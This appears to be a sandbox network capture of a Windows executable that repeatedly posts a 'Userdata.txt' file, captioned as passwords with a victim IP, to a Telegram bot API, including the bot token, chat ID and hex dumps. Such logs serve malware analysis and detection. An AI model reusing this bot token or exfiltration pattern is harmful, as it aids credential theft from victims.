2025-01-10 20:53:35 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 31 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44727,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542415,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49924	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:37 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31a3dcc4e99c Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:37 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 33 64 63 63 34 65 39 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31a3dcc4e99cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:37 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:37 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:37 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 31 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44728,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542417,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49939	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:39 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31ba1ce8ae90 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:39 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 61 31 63 65 38 61 65 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31ba1ce8ae90Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:39 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:39 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:39 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 32 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44729,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542419,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49952	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:41 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31cc23064195 Host: api.telegram.org Content-Length: 1090
2025-01-10 20:53:41 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 63 32 33 30 36 34 31 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31cc23064195Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:41 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:41 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44730,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542421,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49966	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:42 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31de1c6e27df Host: api.telegram.org Content-Length: 1090
2025-01-10 20:53:42 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 65 31 63 36 65 32 37 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31de1c6e27dfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:43 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:43 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44731,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542423,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49978	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:44 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31f16a1963c9 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:44 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 66 31 36 61 31 39 36 33 63 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31f16a1963c9Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:44 GMT Content-Type: application/json Content-Length: 537 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:44 UTC	537	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44732,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542424,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49992	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:46 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3206090b5403 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 36 30 39 30 62 35 34 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3206090b5403Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:46 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:46 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44733,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542426,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49994	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:47 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd321939efa937 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:47 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 39 33 39 65 66 61 39 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd321939efa937Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:48 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:48 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 32 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44734,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542428,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49996	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:49 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd322dba261e7e Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
